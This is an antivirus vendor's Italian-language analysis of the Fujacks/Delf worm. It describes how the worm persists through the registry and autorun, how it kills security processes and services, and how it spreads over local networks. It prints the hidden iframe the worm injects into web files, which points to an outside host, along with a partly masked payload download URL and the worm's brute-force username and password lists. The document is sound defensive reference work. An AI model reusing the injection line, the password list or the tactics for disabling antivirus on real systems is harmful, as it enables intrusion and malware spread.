Ha bisogno di assistenza? Chieda alla community oppure consulti un esperto.
Vai ad Avira Answers
Nome del virus:TR/Proxy.Delf.CA
Scoperto:26/02/2007
Tipo:Worm
In circolazione (ITW):Si
Numero delle infezioni segnalate:Basso
Potenziale di propagazione:Medio
Potenziale di danni:Medio
File statico:Si
Dimensione del file:28.833 Byte
Somma di controllo MD5:916ede7e54c83f11f0f99f7e53178a3b
Versione IVDF:6.37.01.162 - lunedì 26 febbraio 2007

 Generale Metodi di propagazione:
   • Rete locale
   • Unitdi rete mappata


Alias:
   •  Mcafee: W32/Fujacks
   •  Kaspersky: Worm.Win32.Delf.bd
   •  F-Secure: Worm.Win32.Delf.bd
   •  Sophos: W32/Fujacks-AU
   •  Grisoft: Worm/Delf.AEP
   •  Eset: Win32/Fujacks.O
   •  Bitdefender: Win32.Worm.Fujacks.J


Piattaforme / Sistemi operativi:
   • Windows 95
   • Windows 98
   • Windows 98 SE
   • Windows NT
   • Windows ME
   • Windows 2000
   • Windows XP
   • Windows 2003


Effetti secondari:
   • Disattiva le applicazioni di sicurezza
   • Scarica file
   • Duplica file
   • Abbassa le impostazioni di sicurezza
   • Modifica del registro

 File Si copia alle seguenti posizioni:
   • %SYSDIR%\drivers\spoclsv.exe
   • %unit disco%\setup.exe



Delle sezioni vengono aggiunte ai seguenti file.
– A: %tutte le directory%\*.htm Con i seguenti contenuti:
   • iframe src=http://www.krvkr.com/********** width=0 height=0 /iframe

Questo rinomina un file dopo il riavvio del sistema.
– A: %tutte le directory%\*.html Con i seguenti contenuti:
   • iframe src=http://www.krvkr.com/********** width=0 height=0 /iframe

– A: %tutte le directory%\*.asp Con i seguenti contenuti:
   • iframe src=http://www.krvkr.com/********** width=0 height=0 /iframe

– A: %tutte le directory%\*.php Con i seguenti contenuti:
   • iframe src=http://www.krvkr.com/********** width=0 height=0 /iframe

– A: %tutte le directory%\*.jsp Con i seguenti contenuti:
   • iframe src=http://www.krvkr.com/********** width=0 height=0 /iframe

– A: %tutte le directory%\*.aspx Con i seguenti contenuti:
   • iframe src=http://www.krvkr.com/********** width=0 height=0 /iframe




Vengono creati i seguenti file:

%tutte le directory%\Desktop_.ini Questo un file di testo non maligno con il seguente contenuto:
   • %data corrente%

%unit disco%\autorun.inf Questo un file di testo non maligno con il seguente contenuto:
   • %codice che avvia malware%




Prova a scaricare un file:

La posizione la seguente:
   • http://www.baidu8.org/**********/xm.txt
Questo file pu contenere ulteriori posizioni per i download e potrebbe essere utilizzato come fonte di nuove minacce.

 Registro La seguente chiave di registro aggiunta continuamente in un loop infinito, con lo scopo di eseguire il processo dopo il riavvio.

  [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   • %SYSDIR%\drivers\spoclsv.exe



I valori della seguente chiave di registro vengono rimossi:

–  [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   • RavTask
   • KvMonXP
   • kav
   • KAVPersonal50
   • McAfeeUpdaterUI
   • Network Associates Error Reporting Service
   • ShStatEXE
   • YLive.exe
   • yassistse



Viene cambiata la seguente chiave di registro:

Varie opzioni di Explorer:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
   Folder\Hidden\SHOWALL]
   Valore precedente:
   • CheckedValue = %impostazioni definite dell'utente%
   Nuovo valore:
   • CheckedValue = 0

 Infezione della rete Per assicurarsi la propria propagazione, il malware tenta di connettersi ad altre macchine come descritto qui sotto:


Utilizza le seguenti informazioni di login per aprirsi l'accesso alla macchina remota:

La seguente lista di Nomi Utente:
   • Administrator
   • Guest
   • admin
   • Root

La seguente lista di Password:
   • 1234; password; 6969; harley; 123456; golf; pussy; mustang; 1111;
      shadow; 1313; fish; 5150; 7777; qwerty; baseball; 2112; letmein;
      12345678; 12345; ccc; admin; 5201314; qq520; 123; 1234567; 123456789;
      654321; 54321; 111; 000000; abc; 11111111; 88888888; pass; passwd;
      database; abcd; abc123; sybase; 123qwe; server; computer; 520; super;
      123asd; ihavenopass; godblessyou; enable; 2002; 2003; 2600; alpha;
      110; 111111; 121212; 123123; 1234qwer; 123abc; 007; aaa; patrick; pat;
      administrator; root; sex; god; fuckyou; fuck; test; test123; temp;
      temp123; win; asdf; pwd; qwer; yxcv; zxcv; home; xxx; owner; login;
      Login; pw123; love; mypc; mypc123; admin123; mypass; mypass123; 901100



Generazione dell'indirizzo IP:
Crea degli indirizzi IP casuali mentre mantiene i primi tre ottetti dal proprio indirizzo. In seguito prova a stabilire una connessione con gli indirizzi creati.


Processo virale:
Il file scaricato viene allocato nella macchina compromessa come: %tutte le cartelle condivise%\GameSetup.exe


Rallentamento:
Crea il seguente numero di thread infetti: 9
In funzione della larghezza di banda si potrebbe notare un rallentamento nella velocit della rete. Si potrebbe comunque non notarlo nel caso in cui il livello di attivit di rete per questo malware risulti medio e se la connessione di rete a banda larga.
Inoltre si potrebbe notare un leggero rallentamento dovuto ai multipli thread di rete creati.

 Processi terminati Lista dei processi che vengono terminati:
   • Mcshield.exe; VsTskMgr.exe; naPrdMgr.exe; UpdaterUI.exe; TBMon.exe;
      scan32.exe; Ravmond.exe; CCenter.exe; RavTask.exe; Rav.exe;
      Ravmon.exe; RavmonD.exe; RavStub.exe; KVXP.kxp; KvMonXP.kxp;
      KVCenter.kxp; KVSrvXP.exe; KRegEx.exe; UIHost.exe; TrojDie.kxp;
      FrogAgent.exe; Logo1_.exe; Logo_1.exe; Rundl132.exe

I processi che contengono uno dei seguenti titolo finestra vengono terminati:
   • Symantec AntiVirus
   • Duba
   • Windows
   • esteem procs
   • System Safety Monitor
   • Wrapped gift Killer
   • Winsock Expert


I seguenti servizi vengono disattivati:
   • sharedaccess; RsCCenter; RsRavMon; RsCCenter; RsRavMon; KVWSC;
      KVSrvXP; KVWSC; KVSrvXP; AVP; kavsvc; McAfeeFramework; McShield;
      McTaskManager; McAfeeFramework; McShield; McTaskManager; navapsvc;
      wscsvc; KPfwSvc; SNDSrvc; ccProxy; ccEvtMgr; ccSetMgr; SPBBCSvc;
      Symantec Core LC; NPFMntor; MskService; FireSvc

 Dettagli del file Linguaggio di programmazione:
Il malware stato scritto in Delphi.


Software di compressione:
Per complicarne l'individuazione e ridurre la dimensione del file, viene compresso con il seguente software di compressione:
   • FSG

Descrizione inserita da Andrei Gherman su giovedì 19 giugno 2008
Descrizione aggiornata da Andrei Gherman su giovedì 19 giugno 2008

Indietro . . . .
https:// Questa finestra è criptata per tua sicurezza.